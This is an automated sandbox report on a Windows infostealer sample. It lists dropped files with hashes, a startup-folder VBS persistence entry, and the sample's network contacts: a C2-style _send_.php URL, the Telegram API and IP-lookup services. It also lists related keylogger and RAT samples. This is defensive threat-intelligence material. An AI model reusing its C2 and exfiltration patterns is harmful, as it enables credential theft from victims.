https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.32.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587603
Start date and time: 2025-01-10 15:32:44 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: B7N48hmO78.exe (renamed because the original name is a hash value)
Original Sample Name: 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 60
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:33:43 | API Interceptor | 14601283x Sleep call for process: svchost.exe modified
15:33:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | VIAmJUhQ54.exe | malicious | MassLogger RAT |
149.154.167.220 | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
149.154.167.220 | https://marcuso-wq.github.io/home/ | malicious | HTMLPhisher |
149.154.167.220 | https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html | malicious | HTMLPhisher |
149.154.167.220 | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger |
104.21.32.1 | QUOTATION#050125.exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
104.21.32.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | redroomaudio.com/administrator/index.php
132.226.247.73 | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | 1C24TDP_000000029.jse | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | JB#40044 Order.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | oagkiAhXgZ.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.247.73 | fatura098002.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.247.73 | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | VIAmJUhQ54.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
reallyfreegeoip.org | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.96.1
reallyfreegeoip.org | IMG_10503677.exe | malicious | MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.48.1
reallyfreegeoip.org | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | PO#3_RKG367.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.80.1
reallyfreegeoip.org | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
checkip.dyndns.com | VIAmJUhQ54.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
checkip.dyndns.com | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | IMG_10503677.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | PO#3_RKG367.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 158.101.44.242
checkip.dyndns.com | SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
api.telegram.org | VIAmJUhQ54.exe | malicious | MassLogger RAT | 149.154.167.220
api.telegram.org | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | https://marcuso-wq.github.io/home/ | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | VIAmJUhQ54.exe | malicious | MassLogger RAT | 149.154.167.220
TELEGRAMRU | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | https://marcuso-wq.github.io/home/ | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
UTMEMUS | #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
UTMEMUS | 1C24TDP_000000029.jse | malicious | MassLogger RAT | 132.226.247.73
UTMEMUS | jqxrkk.ps1 | malicious | MassLogger RAT | 132.226.8.169
UTMEMUS | Order_List.scr.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
UTMEMUS | fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
UTMEMUS | CTM REQUEST-ETD JAN 22, 2024_pdf.exe | malicious | MassLogger RAT | 132.226.8.169
UTMEMUS | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | JB#40044 Order.exe | malicious | MassLogger RAT | 132.226.247.73
CLOUDFLARENETUS | VIAmJUhQ54.exe | malicious | MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | VYLigyTDuW.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 104.21.80.1
CLOUDFLARENETUS | PO-0005082025 pdf.exe | malicious | FormBook, PureLog Stealer | 172.67.131.144
CLOUDFLARENETUS | zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit |
                                                                                                                • 188.114.96.3
                                                                                                                Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.48.1
                                                                                                                PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                • 104.17.25.14
                                                                                                                https://samantacatering.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 104.21.83.97
                                                                                                                https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGNGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.25.14
                                                                                                                 Associated Sample Name / URL | Detection | Threat Name | Context
                                                                                                                 Match: 54328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                 VIAmJUhQ54.exe | malicious | MassLogger RAT | 104.21.32.1
                                                                                                                 bd9Gvqt6AK.exe | malicious | Snake Keylogger | 104.21.32.1
                                                                                                                 Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.32.1
                                                                                                                 PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.32.1
                                                                                                                 IMG_10503677.exe | malicious | MassLogger RAT | 104.21.32.1
                                                                                                                 RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.32.1
                                                                                                                 Tepe - 20000000826476479.exe | malicious | MassLogger RAT | 104.21.32.1
                                                                                                                 PO#3_RKG367.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.32.1
                                                                                                                 SOA NOV. Gateway Freight_MEDWA0577842.exe | malicious | MassLogger RAT | 104.21.32.1
                                                                                                                 dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
                                                                                                                 Match: 3b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                 VIAmJUhQ54.exe | malicious | MassLogger RAT | 149.154.167.220
                                                                                                                 VYLigyTDuW.exe | malicious | AgentTesla | 149.154.167.220
                                                                                                                 QUOTATION-9044456778.pdf (83kb).com.exe | malicious | PureLog Stealer, Quasar | 149.154.167.220
                                                                                                                 PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                                                                                 https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN | malicious | Unknown | 149.154.167.220
                                                                                                                 IMG_10503677.exe | malicious | MassLogger RAT | 149.154.167.220
                                                                                                                 XClient.exe | malicious | XWorm | 149.154.167.220
                                                                                                                 RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                                                                                 1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exe | malicious | AsyncRAT, DcRat | 149.154.167.220
                                                                                                                No context
                                                                                                                Process:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):204300
                                                                                                                Entropy (8bit):7.983648426421018
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:XDoBs5PIZZdFf6eroXU98Ejv2NyOz87aY7V3fO71:UQid4eKHdzsayV3WR
                                                                                                                MD5:8601E5F7ABAC6B6BC82A2213E6F59E29
                                                                                                                SHA1:525713BA114CCC73C2240B72681F61D3387C9835
                                                                                                                SHA-256:AA787C91EFB2F3737A96A7A95D40D1C639D3C1F50D82FD489596F0945D240C5B
                                                                                                                SHA-512:3EEB7B4121D158825155986AFD3B1FAA9DB293636CF6EAAE46DDFAFD7C8448B1D93D3AC7167DB1311954E75867CBFF9753D85755F6B571DC37C9F2758C96840A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06......3ZT.kE..i..V..E.Ti...Z.H.Pf...r...Uj.J-.._3@..i......X..'...my.\.2I...4..f...b./.....^. ...3{..Ue.G.....Q-.S'.8...g.N...>.R.S..*.D..`.ie..(.......)..,.....8.......$.N..Y...D.L.Qy...F...5.|..%.N.(~=.+.3..`0...5M.M&..M...Z...<.S:.Z..6........aj....kI....zef.......j..Y....z5N.X......J.....H.^+..]....H..&.............iI...}..^......m5..g...C=......6.4..... ...]...W....I..T.J...D.L..".Y..W.....j...(.\2pP.r.F.....r....E(.\5.{+..@....7..j3Ze^.T.Yh..?...5..+}......z!`.......C..M+_Y..m...+u..R]D.k.U.,^...c.8_......2....B........r.3y...2.Bw.-..s...?9....e....O.l.p..a.ZO.}..x1........*...#9...|...-O.Dw.ZN.B..).mV..J.H)...M4._..a...G.}..P......4..H......;a... ...;..Qh...*...C".......:z.b;D..@E.v.gc...6..u\..+.Z.......u\.'...Sc;L0....Z.._LG....f.....@.Mk.../K..h..y.....m-sy...@.....3....>q+EniD....^6.i9..e....II.\nV...q...t./.U..h .%?......ru..zhT*3...hy..[....6.{..@.TP..1k.Yv|...K..u.U9.2A]..q.mv.Ov..-..v......{.......7J.bk..o./..:.....^.G.
                                                                                                                Process:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):204300
                                                                                                                Entropy (8bit):7.983648426421018
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:XDoBs5PIZZdFf6eroXU98Ejv2NyOz87aY7V3fO71:UQid4eKHdzsayV3WR
                                                                                                                MD5:8601E5F7ABAC6B6BC82A2213E6F59E29
                                                                                                                SHA1:525713BA114CCC73C2240B72681F61D3387C9835
                                                                                                                SHA-256:AA787C91EFB2F3737A96A7A95D40D1C639D3C1F50D82FD489596F0945D240C5B
                                                                                                                SHA-512:3EEB7B4121D158825155986AFD3B1FAA9DB293636CF6EAAE46DDFAFD7C8448B1D93D3AC7167DB1311954E75867CBFF9753D85755F6B571DC37C9F2758C96840A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06......3ZT.kE..i..V..E.Ti...Z.H.Pf...r...Uj.J-.._3@..i......X..'...my.\.2I...4..f...b./.....^. ...3{..Ue.G.....Q-.S'.8...g.N...>.R.S..*.D..`.ie..(.......)..,.....8.......$.N..Y...D.L.Qy...F...5.|..%.N.(~=.+.3..`0...5M.M&..M...Z...<.S:.Z..6........aj....kI....zef.......j..Y....z5N.X......J.....H.^+..]....H..&.............iI...}..^......m5..g...C=......6.4..... ...]...W....I..T.J...D.L..".Y..W.....j...(.\2pP.r.F.....r....E(.\5.{+..@....7..j3Ze^.T.Yh..?...5..+}......z!`.......C..M+_Y..m...+u..R]D.k.U.,^...c.8_......2....B........r.3y...2.Bw.-..s...?9....e....O.l.p..a.ZO.}..x1........*...#9...|...-O.Dw.ZN.B..).mV..J.H)...M4._..a...G.}..P......4..H......;a... ...;..Qh...*...C".......:z.b;D..@E.v.gc...6..u\..+.Z.......u\.'...Sc;L0....Z.._LG....f.....@.Mk.../K..h..y.....m-sy...@.....3....>q+EniD....^6.i9..e....II.\nV...q...t./.U..h .%?......ru..zhT*3...hy..[....6.{..@.TP..1k.Yv|...K..u.U9.2A]..q.mv.Ov..-..v......{.......7J.bk..o./..:.....^.G.
                                                                                                                Process:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):204300
                                                                                                                Entropy (8bit):7.983648426421018
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:XDoBs5PIZZdFf6eroXU98Ejv2NyOz87aY7V3fO71:UQid4eKHdzsayV3WR
                                                                                                                MD5:8601E5F7ABAC6B6BC82A2213E6F59E29
                                                                                                                SHA1:525713BA114CCC73C2240B72681F61D3387C9835
                                                                                                                SHA-256:AA787C91EFB2F3737A96A7A95D40D1C639D3C1F50D82FD489596F0945D240C5B
                                                                                                                SHA-512:3EEB7B4121D158825155986AFD3B1FAA9DB293636CF6EAAE46DDFAFD7C8448B1D93D3AC7167DB1311954E75867CBFF9753D85755F6B571DC37C9F2758C96840A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06......3ZT.kE..i..V..E.Ti...Z.H.Pf...r...Uj.J-.._3@..i......X..'...my.\.2I...4..f...b./.....^. ...3{..Ue.G.....Q-.S'.8...g.N...>.R.S..*.D..`.ie..(.......)..,.....8.......$.N..Y...D.L.Qy...F...5.|..%.N.(~=.+.3..`0...5M.M&..M...Z...<.S:.Z..6........aj....kI....zef.......j..Y....z5N.X......J.....H.^+..]....H..&.............iI...}..^......m5..g...C=......6.4..... ...]...W....I..T.J...D.L..".Y..W.....j...(.\2pP.r.F.....r....E(.\5.{+..@....7..j3Ze^.T.Yh..?...5..+}......z!`.......C..M+_Y..m...+u..R]D.k.U.,^...c.8_......2....B........r.3y...2.Bw.-..s...?9....e....O.l.p..a.ZO.}..x1........*...#9...|...-O.Dw.ZN.B..).mV..J.H)...M4._..a...G.}..P......4..H......;a... ...;..Qh...*...C".......:z.b;D..@E.v.gc...6..u\..+.Z.......u\.'...Sc;L0....Z.._LG....f.....@.Mk.../K..h..y.....m-sy...@.....3....>q+EniD....^6.i9..e....II.\nV...q...t./.U..h .%?......ru..zhT*3...hy..[....6.{..@.TP..1k.Yv|...K..u.U9.2A]..q.mv.Ov..-..v......{.......7J.bk..o./..:.....^.G.
                                                                                                                Process:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):208384
                                                                                                                Entropy (8bit):7.838019958242408
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:04cY976eOxWDNd2svYaQ/yCnhxPvjkoxRiI5nwNXRTVOQ9GVKrqpsECeXD82ssZg:x9nOxeRVwZbiOcZ9GVlaiXwl60F
                                                                                                                MD5:B87813394D89C367C3454AE8D8F014D3
                                                                                                                SHA1:32B98A0058C96BFD5919C716124B5A0B8756C9A4
                                                                                                                SHA-256:3F66E8474DF26704D3C490E822E9384D4BEB872D540D6D5EB4579064AF5A8440
                                                                                                                SHA-512:69236C230E0A7B58B845C918A08D92252B7E98DB16EB54151753F06F215253860F34E2F4CF4C340B60318AD15C24F68E3181278238C525F0FE3BB1F7FC29813B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.n.5J75EW5LY..DE.QOX5VLHtA5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUT.EFQAG.XL.=...6y.ra$0&t47)6=9Xv/)Z/Z=.W sG97u=*e...xX9(-.L8C.5ES5LYU<T.k}>.Kz=.JmD.I.f,Ks(.*O../d).(`9.?i8.Kwp[2E$.:we81.D.2z.:KdF.;.\/1y%.;FQOX5VLH4A5I75ES...3TDEF..X5.ML45.Ig5ES5LYUT.EePDY<VL.5A5.65ES5Lv.TDEVQOX.WLH4.5I'5ES7LYPTDEFQOX0VLH4A5I7EFS5HYU..GFSOX.VLX4A%I75EC5LIUTDEFQ_X5VLH4A5I75.F7L.UTDE&SO.9WLH4A5I75ES5LYUTDEFQOX5VLH..4I+5ES5LYUTDEFQOX5VLH4A5I75ES5.TWT.EFQOX5VLH4A5.65.R5LYUTDEFQOX5VLH4A5I75ES5LY{ !=2QOX-.MH4Q5I7.DS5HYUTDEFQOX5VLH4a5IW.77T88UT.(FQO.4VL&4A5.65ES5LYUTDEFQO.5V.fP A(75E..LYUtFEFGOX5\NH4A5I75ES5LYU.DE..=+G5LH4.9H75%Q5LWTTDeDQOX5VLH4A5I75.S5.YUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5L
                                                                                                                Process:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):649216
                                                                                                                Entropy (8bit):7.943126339759557
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx
                                                                                                                MD5:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                SHA1:F491FC184D0F15D789E81577E47446478C10ED53
                                                                                                                SHA-256:3FC9AFA49FA31F495A7792C38B6087609438625EC5073383483D7D1411C7CEC8
                                                                                                                SHA-512:F2604FC98D1ED6959B4A42EF442CAC15919EBB1B26F7516FA0CA782C639D035C7F5C0F599511E87246338A959BE4E5104FF98E3DF4BB7AB78B50389784E83432
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...B.Gg.........."......P.........../.......@....@.......................................@...@.......@.........................$....@..............................................................t1..H...........................................UPX0....................................UPX1.....P.......B..................@....rsrc........@.......F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                                                                                Process:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):282
                                                                                                                Entropy (8bit):3.4138021730875194
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1MlxkRIwmUHA6nriIM8lfQVn:DsO+vNlzQ1MlCRILUg4mA2n
                                                                                                                MD5:33D15533EB9FBA37FE4AFE3DFD4F342B
                                                                                                                SHA1:7D4EF44BBDD42BE378956219BF8BF0B04450B50F
